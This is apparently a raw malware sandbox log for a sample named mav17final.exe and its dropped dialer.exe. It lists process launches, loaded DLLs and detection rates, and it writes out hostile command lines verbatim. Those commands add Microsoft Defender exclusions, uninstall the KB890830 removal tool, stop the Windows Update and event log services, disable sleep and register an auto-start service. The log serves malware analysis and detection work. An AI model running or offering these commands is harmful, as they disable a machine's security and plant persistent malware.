Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dwm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\mav17final.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mav17final.exe | ReversingLabs: Detection: 34%
Source: mav17final.exe | Virustotal: Detection: 16%
Source: C:\Users\user\Desktop\mav17final.exe | File read: C:\Users\user\Desktop\mav17final.exe
Source: unknown | Process created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"
Source: C:\Users\user\Desktop\mav17final.exe | Process created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"
Source: C:\Users\user\Desktop\mav17final.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\mav17final.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\dialer.exe C:\Users\user\AppData\Local\Temp\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Build"
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Build"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\dialer.exe C:\ProgramData\dialer.exe
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\wusa.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dialer.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
      Source: C:\Users\user\Desktop\mav17final.exe | Process created: C:\Users\user\Desktop\mav17final.exe "C:\Users\user\Desktop\mav17final.exe"
      Source: C:\Users\user\Desktop\mav17final.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
      Source: C:\Users\user\Desktop\mav17final.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\dialer.exe C:\Users\user\AppData\Local\Temp\dialer.exe
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Build"
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Build"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: vcruntime140.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: python3.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: libffi-8.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: pdh.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: wtsapi32.dll
      Source: C:\Users\user\Desktop\mav17final.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\dialer.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\ProgramData\dialer.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
